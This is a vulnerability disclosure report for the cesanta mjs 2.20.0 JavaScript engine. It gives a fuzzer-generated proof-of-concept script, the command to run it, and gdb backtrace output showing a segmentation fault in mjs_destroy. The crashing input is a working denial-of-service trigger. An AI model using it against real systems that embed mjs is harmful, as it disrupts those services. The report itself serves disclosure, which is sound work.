let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+=888 i;
c /= 0, c = 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
run command
mjs -f poc
gdb info
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
7563 mbuf_free(&mjs->json_visited_stack);
(gdb) bt
#0 0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
#1 0x000000000040d413 in mjs_exec_internal (mjs=0x1db2260,
path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1",
src=0x1db3cb0 "let i, a = 0, b0= 0, c = 0continu, d0, e = 0;\n\nfor (i = 8; i < 20; i++) {\n a let z = JSON.parse('\"\"'); // Zlength string\nlet s2 = JSON.stringify+=888 i;\nc /= 0, c = 0let s = '0", '8' <repeats 13 times>, " true,"..., generate_jsc=0, res=0x7ffd20341a58)
at mjs.c:9044
#2 0x000000000040d4d5 in mjs_exec_file (mjs=0x1db2260,
path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1",
res=0x7ffd20341aa0) at mjs.c:9067
#3 0x000000000041082e in main (argc=3, argv=0x7ffd20341ba8) at mjs.c:11406
(gdb) list
7558 mbuf_free(&mjs->owned_strings);
7559 mbuf_free(&mjs->foreign_strings);
7560 mbuf_free(&mjs->owned_values);
7561 mbuf_free(&mjs->scopes);
7562 mbuf_free(&mjs->loop_addresses);
7563 mbuf_free(&mjs->json_visited_stack);
7564 free(mjs->error_msg);
7565 free(mjs->stack_trace);
7566 mjs_ffi_args_free_list(mjs);
7567 gc_arena_destroy(mjs, &mjs->object_arena);
The name of an affected Product
mjs
The affected version
Commit: b1b6eac (Tag: 2.20.0)
Description
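An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the mjs.c file. The gdb output above shows the process receiving SIGSEGV at mjs.c:7563 (`mbuf_free(&mjs->json_visited_stack);`) inside mjs_destroy, reached from mjs_exec_internal while executing the malformed script passed with `mjs -f poc`. The backtrace shows where the fault surfaces, not necessarily its root cause, and the crash is only reachable where the embedding application executes scripts from an untrusted source.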
Vulnerability Type
Segmentation fault on program counter
Environment
Steps to Reproduce
poc
run command
gdb info